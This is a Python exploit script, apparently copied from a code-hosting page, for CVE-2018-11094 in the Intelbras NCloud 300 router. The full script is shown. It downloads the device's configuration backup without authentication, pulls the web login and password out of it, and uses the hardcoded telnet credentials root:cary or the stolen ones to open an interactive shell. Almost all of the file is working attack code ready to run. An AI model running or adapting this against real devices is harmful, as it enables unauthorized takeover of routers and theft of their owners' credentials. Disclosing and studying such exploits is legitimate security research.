80 lines
No EOL
2.9 KiB
Python
Executable file
80 lines
No EOL
2.9 KiB
Python
Executable file
# coding: utf-8
|
|
# Exploit Title: Intelbras NCloud Authentication bypass
|
|
# Date: 16/05/2018
|
|
# Exploit Author: Pedro Aguiar - pedro.aguiar@kryptus.com
|
|
# Vendor Homepage: http://www.intelbras.com.br/
|
|
# Software Link: http://www.intelbras.com.br/empresarial/wi-fi/para-sua-casa/roteadores/ncloud
|
|
# Version: 1.0
|
|
# Tested on: Linux
|
|
# CVE : CVE-2018-11094
|
|
# Description: As described here: https://blog.kos-lab.com/Hello-World/ the Ncloud 300 device does not properly
|
|
# enforce authentication, allowing an attacker to remotely download the configurations backup ('/cgi-bin/ExportSettings.sh').
|
|
# The configurations backup file contains the web interface username and password.
|
|
# Also, there are hardcoded credentials in the telnet service (root:cary), in cases where root user does not exist,
|
|
# it was replaced by the web interface credentials. This exploit downloads the backup file and tries to use the credentials
|
|
# to log into the device using telnet.
|
|
|
|
import sys
|
|
import requests
|
|
import telnetlib
|
|
import re
|
|
|
|
def help():
|
|
print 'Usage: '
|
|
print 'python exploit.py http://192.168.0.1'
|
|
|
|
def pop_shell(host, user, password):
|
|
if(user == "root"):
|
|
print '[+] Trying default credentials: root:cary'
|
|
else:
|
|
print '[+] Trying credentials obtained from /cgi-bin/ExportSettings.sh'
|
|
with open('NCLOUD_config.dat', "r") as f:
|
|
content = f.read()
|
|
user = content.split("Login=")[1].split("\n")[0]
|
|
password = content.split("Password=")[1].split("\n")[0]
|
|
#print 'User: '+ user
|
|
#print 'Password: '+ password
|
|
f.close()
|
|
try:
|
|
ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', host)[0]
|
|
tn = telnetlib.Telnet(ip, 23, timeout=10)
|
|
tn.expect(["WORKGROUP login:"], 5)
|
|
tn.write(user + "\r\n")
|
|
tn.expect(["Password:"], 5)
|
|
tn.write(password + "\r\n")
|
|
i = tn.expect(["Login incorrect"], 5)
|
|
if i[0] != -1:
|
|
raise ValueError('[-] Wrong credential')
|
|
tn.write("cat /proc/cpuinfo\r\n")
|
|
tn.interact()
|
|
|
|
tn.close()
|
|
except Exception as e:
|
|
print e
|
|
if(user == "root"):
|
|
pop_shell(host, 'try', 'again')
|
|
|
|
def exploit(host):
|
|
print '[*] Connecting to %s' %host
|
|
path = '/cgi-bin/ExportSettings.sh'
|
|
payload = 'Export=Salvar'
|
|
|
|
response = requests.post(host + path, data=payload)
|
|
response.raise_for_status()
|
|
|
|
if(response.status_code == 200 and "Login=" in response.text):
|
|
print '[+] Config download was successful'
|
|
print '[+] Saving backup file to NCLOUD_config.dat'
|
|
with open('NCLOUD_config.dat', "w") as f:
|
|
f.write(response.text)
|
|
f.close()
|
|
pop_shell(host, "root", "cary")
|
|
def main():
|
|
if len(sys.argv) < 2 or not sys.argv[1].startswith('http://'):
|
|
help()
|
|
return
|
|
host = sys.argv[1]
|
|
exploit(host)
|
|
|
|
if __name__ == '__main__':
|
|
main() |